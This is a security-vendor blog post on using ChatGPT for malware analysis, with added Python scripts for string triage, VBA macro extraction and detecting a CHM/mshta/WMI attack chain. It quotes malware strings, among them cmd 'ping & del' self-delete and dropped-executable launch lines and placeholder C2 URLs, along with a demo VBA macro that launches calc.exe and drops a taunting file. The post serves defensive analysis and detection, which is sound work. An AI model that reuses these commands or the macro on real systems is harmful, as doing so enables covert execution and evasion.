ChatGPT and Malware Analysis – ThreatMon


What is ChatGPT?

ChatGPT is an AI-driven chatbot launched by OpenAI in November 2022. It is a variant of the GPT (Generative Pre-trained Transformer) language model that has been fine-tuned for conversational response generation. Like other GPT models, it uses a transformer architecture to process and generate text, but it was further trained on human-written conversational data and then tuned with Reinforcement Learning from Human Feedback (RLHF), which is what lets it follow the context and tone of a natural exchange and produce replies that read as human-like and appropriate to the conversation.

One of the main advantages of ChatGPT is its ability to generate responses that are relevant and coherent within the context of a conversation. It can also handle a wide range of topics and styles of communication, making it a useful tool for tasks such as chatbots, customer service, and language translation.

ChatGPT is built on the GPT-3.5 series of models. Its predecessors GPT-2 and GPT-3 are not chat variants of ChatGPT but earlier general-purpose models in the same family; each was larger and trained on more data than the last, and that scaling is what made increasingly human-like responses possible.

Overall, ChatGPT is a powerful language model that has the ability to understand and generate human-like responses in a conversational context, making it a valuable tool for a variety of applications.

How Do We Use ChatGPT for Malware Analysis?

First of all, we asked this question to ChatGPT 🙂 Let's see what answers we got.

Q:How can we use ChatGPT for our Malware Analysis and Reverse Engineering purposes?

In addition to what ChatGPT previously mentioned, it can also:
  • Analyze data obtained from simple static analysis and produce logical comments for us. Given the output of static analysis, such as code structure, strings and function calls, it can generate comments that describe the likely purpose and behavior of the code.
  • Analyze malicious macro code found in malicious Office documents. Macro code is embedded in the document and runs when the document is opened; ChatGPT can read it and say whether it looks malicious.
  • Deobfuscate code for us. It can take code that has been deliberately made hard to read through obfuscation and rewrite it in a readable form. The result should still be checked against the original sample, since a language model can confidently produce a plausible but wrong reconstruction.
  • Analyze code and explain its purpose to us. It can work out the intended behavior of a piece of code and explain what it is trying to accomplish.
  • Provide mitigations for any potential security issues it identifies. It can suggest how to address vulnerabilities or attack vectors it finds during analysis.


Let's say we have an executable but we do not know its capabilities. There are interesting strings:

and suspicious API calls in the import table:

Let’s ask ChatGPT.

Q:We have strings taken from a file that we suspect to be malware. Can you review them and give us your comments? What do you think the purpose could be?

  • exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "%s
  • http://ssl-345345345.helpdeskbros.local/favicon.ico
  • C:\Users\Public\Documents\CR43333.dat.exe
  • Mozilla/5.0
  • http://verysuspicioussite.com
  • ping 1.1.1.1 -n 1 -w 3000 > Nul & C:\Users\Public\Documents\CR43333.dat.exe
  • open
  • ineIGenu

And it can tell us what these API calls are used for:

Q:There are suspicious API calls in the same malware; why might it be using them?

  • GetCurrentProcessId
  • URLDownloadToFileW
  • InternetOpenW
  • InternetOpenUrlW
  • CreateProcessW
  • GetCurrentThreadId
  • TerminateProcess
  • ShellExecuteW
  • IsProcessorFeaturePresent
  • IsDebuggerPresent
  • QueryPerformanceCounter
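As an added example (not ThreatMon's tooling), the script below does the first pass an analyst should run over the strings and imports quoted above before asking a model about them, so that the model's commentary can be checked against something. The rule set and the list of compiler-runtime imports are the editor's; the two sample lists are constructed from the post. Two points are worth verifying in any model-generated explanation of this sample: "ineIGenu" (together with "ntel") is the CPUID vendor string GenuineIntel split into 32-bit immediates by the MSVC runtime's processor check, not malware logic; and GetCurrentProcessId, GetCurrentThreadId, QueryPerformanceCounter, IsProcessorFeaturePresent, TerminateProcess and IsDebuggerPresent are imported by every MSVC-built binary (security-cookie seeding and the fast-fail path), so IsDebuggerPresent on its own is not evidence of anti-debugging.

```python
"""Rule-based first-pass triage of strings and imports from a suspect PE.

Added example for this post; the rules are the editor's, not ThreatMon's.
SAMPLE_STRINGS / SAMPLE_IMPORTS are constructed from the values quoted in the
post; no binary is parsed here.
"""
import re

SAMPLE_STRINGS = [
    'exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "%s',
    "http://ssl-345345345.helpdeskbros.local/favicon.ico",
    r"C:\Users\Public\Documents\CR43333.dat.exe",
    "Mozilla/5.0",
    "http://verysuspicioussite.com",
    r"ping 1.1.1.1 -n 1 -w 3000 > Nul & C:\Users\Public\Documents\CR43333.dat.exe",
    "open",
    "ineIGenu",
]

SAMPLE_IMPORTS = [
    "GetCurrentProcessId", "URLDownloadToFileW", "InternetOpenW",
    "InternetOpenUrlW", "CreateProcessW", "GetCurrentThreadId",
    "TerminateProcess", "ShellExecuteW", "IsProcessorFeaturePresent",
    "IsDebuggerPresent", "QueryPerformanceCounter",
]

# (tag, pattern, what the match usually means)
STRING_RULES = [
    ("self-delete", re.compile(r"ping\s+\S+\s+-n\s+\d+.*&\s*del\b", re.I),
     "cmd /C ping <host> -n N ... & del: sleep via ping, then delete own file"),
    ("delayed-exec", re.compile(r"ping\s+\S+\s+-n\s+\d+.*&\s*[a-z]:\\.*\.exe", re.I),
     "sleep via ping, then launch a dropped executable"),
    ("drop-path", re.compile(r"^[a-z]:\\users\\public\\", re.I),
     "C:\\Users\\Public is writable by every local user: common drop location"),
    ("double-ext", re.compile(r"\.[a-z0-9]{2,4}\.exe$", re.I),
     "double extension disguises an executable as a data file"),
    ("url", re.compile(r"^https?://", re.I),
     "hard-coded URL: candidate payload or C2 host"),
    ("user-agent", re.compile(r"^Mozilla/\d", re.I),
     "hard-coded HTTP User-Agent: the sample speaks HTTP itself"),
    ("shellexecute-verb", re.compile(r"^open$"),
     '"open" is the ShellExecute verb; weak evidence on its own'),
    ("crt-cpuid", re.compile(r"^(ineIGenu|ntel|Genu|AuthenticAMD)$"),
     "GenuineIntel split into 32-bit immediates by the MSVC runtime's CPUID check; compiler noise"),
]

CAPABILITIES = {
    "download": {"URLDownloadToFileW", "URLDownloadToFileA", "InternetOpenW",
                 "InternetOpenA", "InternetOpenUrlW", "InternetOpenUrlA",
                 "InternetReadFile", "WinHttpOpen", "WinHttpSendRequest"},
    "execute": {"CreateProcessW", "CreateProcessA", "ShellExecuteW",
                "ShellExecuteA", "ShellExecuteExW", "WinExec"},
    "anti-debug": {"IsDebuggerPresent", "CheckRemoteDebuggerPresent",
                   "NtQueryInformationProcess", "OutputDebugStringA"},
}

# Imported by every MSVC-built binary (security-cookie seeding and the
# __fastfail / GS-failure path), so on their own they mean nothing.
CRT_NOISE = {"GetCurrentProcessId", "GetCurrentThreadId", "QueryPerformanceCounter",
             "GetSystemTimeAsFileTime", "GetTickCount", "IsProcessorFeaturePresent",
             "IsDebuggerPresent", "TerminateProcess", "UnhandledExceptionFilter",
             "SetUnhandledExceptionFilter", "InitializeSListHead"}


def triage_strings(strings):
    """Return [(tag, string, explanation)] for every string matching a rule."""
    hits = []
    for s in strings:
        for tag, pat, why in STRING_RULES:
            if pat.search(s):
                hits.append((tag, s, why))
    return hits


def triage_imports(imports):
    """Group imports by capability and split off CRT boilerplate."""
    present = set(imports)
    caps = {name: sorted(present & apis) for name, apis in CAPABILITIES.items()}
    caps = {k: v for k, v in caps.items() if v}
    noise = sorted(present & CRT_NOISE)
    # An anti-debug category backed only by CRT imports is not evidence.
    if "anti-debug" in caps and set(caps["anti-debug"]) <= CRT_NOISE:
        caps["anti-debug (CRT only, ignore)"] = caps.pop("anti-debug")
    return caps, noise


def assess(strings, imports):
    """Combine both views into a one-line working hypothesis."""
    tags = {t for t, _, _ in triage_strings(strings)}
    caps, _ = triage_imports(imports)
    parts = []
    if "download" in caps and ("url" in tags or "user-agent" in tags):
        parts.append("downloads a payload over HTTP")
    if "execute" in caps and ("drop-path" in tags or "delayed-exec" in tags):
        parts.append("writes it under C:\\Users\\Public and runs it")
    if "self-delete" in tags:
        parts.append("deletes itself via cmd /C ping & del")
    return "; ".join(parts) if parts else "no capability inferred from static view"


if __name__ == "__main__":
    for tag, s, why in triage_strings(SAMPLE_STRINGS):
        print(f"[{tag:17}] {s}\n{'':20}{why}")
    caps, noise = triage_imports(SAMPLE_IMPORTS)
    print("capabilities:", caps)
    print("CRT boilerplate:", noise)
    print("hypothesis:", assess(SAMPLE_STRINGS, SAMPLE_IMPORTS))
```

The hypothesis the script reaches for this sample (download over HTTP, drop under C:\Users\Public, execute, self-delete through cmd /C ping & del) is the baseline a model's answer should match; anything a model adds beyond it, such as persistence or anti-analysis claims, needs evidence from the binary rather than from the strings list.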

Malicious Document Analysis

Suppose that we have a suspicious Office document with the extension "docm", which means it is macro-enabled. First we will extract the macro code from the file.
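The extraction step, as an added example that is not the post's own tooling: a .docm is a ZIP archive whose word/vbaProject.bin is an OLE compound file, and each module's source sits in a stream under VBA/ compressed with the MS-OVBA algorithm ([MS-OVBA] section 2.4.1). The decompressor below implements that algorithm and is exercised on constructed containers (including a hand-built copy token); locating the streams in a real file uses the third-party olefile package, and the scan for where the compressed source starts inside a module stream is a heuristic (olevba reads the exact offset from the dir stream instead).

```python
"""Pull VBA source out of a macro-enabled Office file.

Added example for this post, not ThreatMon's tooling. The MS-OVBA
decompressor is self-contained; extract_macros() additionally needs the
third-party olefile package, imported lazily so the rest runs without it.
"""
import math
import zipfile


def decompress_vba(container: bytes) -> bytes:
    """Decompress an MS-OVBA CompressedContainer (first byte 0x01)."""
    if not container or container[0] != 0x01:
        raise ValueError("not a VBA compressed container")
    out = bytearray()
    pos = 1
    while pos < len(container):
        header = int.from_bytes(container[pos:pos + 2], "little")
        pos += 2
        if (header >> 12) & 0x7 != 0b011:
            raise ValueError("bad chunk signature")
        # Low 12 bits hold (chunk size - 3); the 2 header bytes are already consumed.
        chunk_end = pos + (header & 0x0FFF) + 1
        chunk_start = len(out)
        if not header & 0x8000:                 # uncompressed chunk: raw 4096 bytes
            out += container[pos:chunk_end]
            pos = chunk_end
            continue
        while pos < chunk_end:
            flags = container[pos]              # one bit per following token
            pos += 1
            for bit in range(8):
                if pos >= chunk_end:
                    break
                if not (flags >> bit) & 1:      # literal byte
                    out.append(container[pos])
                    pos += 1
                    continue
                token = int.from_bytes(container[pos:pos + 2], "little")
                pos += 2
                # Offset/length bit split depends on how much of this chunk is decoded.
                diff = len(out) - chunk_start
                bit_count = max(math.ceil(math.log2(diff)), 4) if diff > 0 else 4
                length = (token & (0xFFFF >> bit_count)) + 3
                offset = (token >> (16 - bit_count)) + 1
                src = len(out) - offset
                if src < 0:
                    raise ValueError("copy token points before chunk start")
                for i in range(length):         # byte-wise: source may overlap output
                    out.append(out[src + i])
    return bytes(out)


def compress_literals(data: bytes) -> bytes:
    """Build a valid container using literal tokens only (test-input generator)."""
    out = bytearray(b"\x01")
    for start in range(0, len(data), 3640):     # 3640 + 455 flag bytes fits one chunk
        chunk = data[start:start + 3640]
        body = bytearray()
        for i in range(0, len(chunk), 8):
            body.append(0x00)                   # flag byte: eight literals follow
            body += chunk[i:i + 8]
        header = 0xB000 | (len(body) - 1)       # compressed, signature 011, size-3
        out += header.to_bytes(2, "little") + body
    return bytes(out)


def find_source(stream: bytes):
    """Heuristic: module streams carry a binary cache before the compressed
    source; accept the first candidate container that decodes to VBA text."""
    for i in range(len(stream) - 2):
        if stream[i] == 0x01 and (stream[i + 2] & 0x70) == 0x30:
            try:
                text = decompress_vba(stream[i:])
            except (ValueError, IndexError):
                continue
            if text.startswith(b"Attribute VB_"):
                return text
    return None


def extract_macros(docm_path: str) -> dict:
    """Map VBA module stream names to their decompressed source (needs olefile)."""
    import olefile  # third-party; only needed for real files
    vba_bin = zipfile.ZipFile(docm_path).read("word/vbaProject.bin")
    ole = olefile.OleFileIO(vba_bin)
    modules = {}
    for path in ole.listdir(streams=True):
        if len(path) < 2 or path[-2] != "VBA":
            continue
        if path[-1] in ("dir", "_VBA_PROJECT") or path[-1].startswith("__SRP_"):
            continue
        src = find_source(ole.openstream(path).read())
        if src is not None:
            modules["/".join(path)] = src.decode("latin-1")
    return modules


if __name__ == "__main__":
    # Hand-encoded container: literal 'a' then a copy token (offset 1, length 7).
    print(decompress_vba(b"\x01\x03\xb0\x02\x61\x04\x00"))
```

Usage on a real sample is extract_macros("suspect.docm"), which returns one entry per module; the same routine covers .xlsm and .pptm if the vbaProject.bin path is adjusted for their package layout.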

The code is easy to read but we will ask ChatGPT.

Q:Hi I have a Macro Code extracted from a malicious docm file. What do you think this code is trying to do?

Sub OpenCalculatorAndCreateFile()
    Dim FilePath As String
    ' Launch calc.exe in a normal window (proof-of-execution payload)
    Shell "calc.exe", vbNormalFocus
    ' Resolve the current user's Desktop through WScript.Shell and build the drop path
    FilePath = CreateObject("WScript.Shell").SpecialFolders("Desktop") & "\HAHAHA.txt"
    ' Create (or overwrite) the file and write a marker line
    Open FilePath For Output As #1
    Print #1, "YOU ARE HACKED XD"
    Close #1
End Sub

Did you know that we used ChatGPT in our latest blog post? Let’s see how it helped us.

First, we gave ChatGPT the VBScript and asked it to deobfuscate the code and explain what it is trying to do.

Q: Can you deobfuscate this code? What is this trying to do?

Then we asked ChatGPT for mitigations.

Q:We have an APT Group that used malicious CHM files in this attack. CHM File contains a malicious htm file which displays the decoy windows and executes the malicious code. Malicious code use HHCtrl ActiveX and MSHTA to execute remote .htm file. HTM file contains VBScript. WMI (Windows Management Instrumentation) is used by this VBScript to connect to the local system and create a new process using the CreateObject method to create an instance of the “WbemScripting.SWbemLocator” class and the ConnectServer method to connect to the local machine. Then it creates an instance of the “Win32_ProcessStartup” class and “Win32_Process” class, these classes are used to configure and start a new process. Give me mitigations in detail.
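Whatever mitigations a model suggests, the chain described in the question leaves a distinctive process-creation trail that can be checked directly: HHCtrl commands run as children of hh.exe, mshta.exe is handed a remote .htm, and a process created through Win32_Process.Create has the WMI provider host WmiPrvSE.exe as its parent. The following is an added example (the editor's rules, not the post's or any vendor's) that runs those three checks over constructed process-creation events using Sysmon Event ID 1 field names; the hostnames and paths in the events are made up for the demo.

```python
"""Detect the CHM -> mshta -> WMI process chain in process-creation events.

Added example for this post. Field names follow Sysmon Event ID 1
(Image, ParentImage, CommandLine); SAMPLE_EVENTS is constructed for the demo
and the rules are the editor's.
"""
import ntpath
import re

# Script hosts and proxies that WMI should not be launching from a document chain.
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# http(s) URL or UNC path anywhere in the command line
REMOTE_SOURCE = re.compile(r"(https?://|\\\\[^\s\\]+\\)", re.I)

SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\hh.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\hh.exe" C:\Users\bob\Downloads\invite.chm'},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\hh.exe",
     "CommandLine": "mshta.exe http://decoy.example/update.htm"},
    {"Image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r'cmd.exe /c "C:\Users\Public\upd.bat"'},
    # benign: local HTA opened by the user
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\help.hta"'},
    # benign: built-in help file
    {"Image": r"C:\Windows\hh.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\hh.exe" C:\Windows\Help\mui\0409\mmc.chm'},
]


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def rules(evt):
    """Yield (rule_name, severity) for every rule one event trips."""
    img, parent = basename(evt["Image"]), basename(evt["ParentImage"])
    cmd = evt.get("CommandLine", "")
    if parent == "hh.exe" and img != "hh.exe":
        # HHCtrl ActiveX "shortcut" commands run as children of the help viewer
        yield ("chm_spawns_child", "high" if img in INTERPRETERS else "medium")
    if img == "mshta.exe" and REMOTE_SOURCE.search(cmd):
        # mshta fetching and executing remote HTML/script
        yield ("mshta_remote_content", "high")
    if parent == "wmiprvse.exe" and img in INTERPRETERS:
        # Win32_Process.Create from script: the child's parent is the provider host
        yield ("wmi_spawned_interpreter", "high")


def detect(events):
    """Return [(event_index, rule_name, severity)] over a list of events."""
    return [(i, rule, sev) for i, e in enumerate(events) for rule, sev in rules(e)]


if __name__ == "__main__":
    for i, rule, sev in detect(SAMPLE_EVENTS):
        print(f"event {i}: {rule} [{sev}] {SAMPLE_EVENTS[i]['CommandLine']}")
```

The two benign events show why the rules key on parent/child relationships and on a remote source rather than on the binaries alone: hh.exe and mshta.exe are legitimate Windows components, so blocking them outright (for example through AppLocker or WDAC policy, where mshta.exe is a common candidate) is a policy decision, while the detection above stays usable where that is not an option.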


Conclusion

ChatGPT is an AI-powered chatbot developed by OpenAI that uses a transformer architecture to process and generate text. It has been fine-tuned on conversational data and with RLHF, which allows it to generate responses that are human-like and appropriate for a given conversation. ChatGPT can be used for tasks such as customer service assistants and language translation, and one of its main advantages is its ability to generate responses that are relevant and coherent within the context of a conversation.

In addition to its conversational capabilities, ChatGPT can also be used for malware analysis and reverse engineering. It can analyze data obtained from simple static analysis and produce logical comments for the purpose and behavior of the code. It can also analyze malicious macro code found in office documents and deobfuscate code. ChatGPT can also analyze code and explain its purpose, as well as provide mitigations for any potential security issues it identifies.
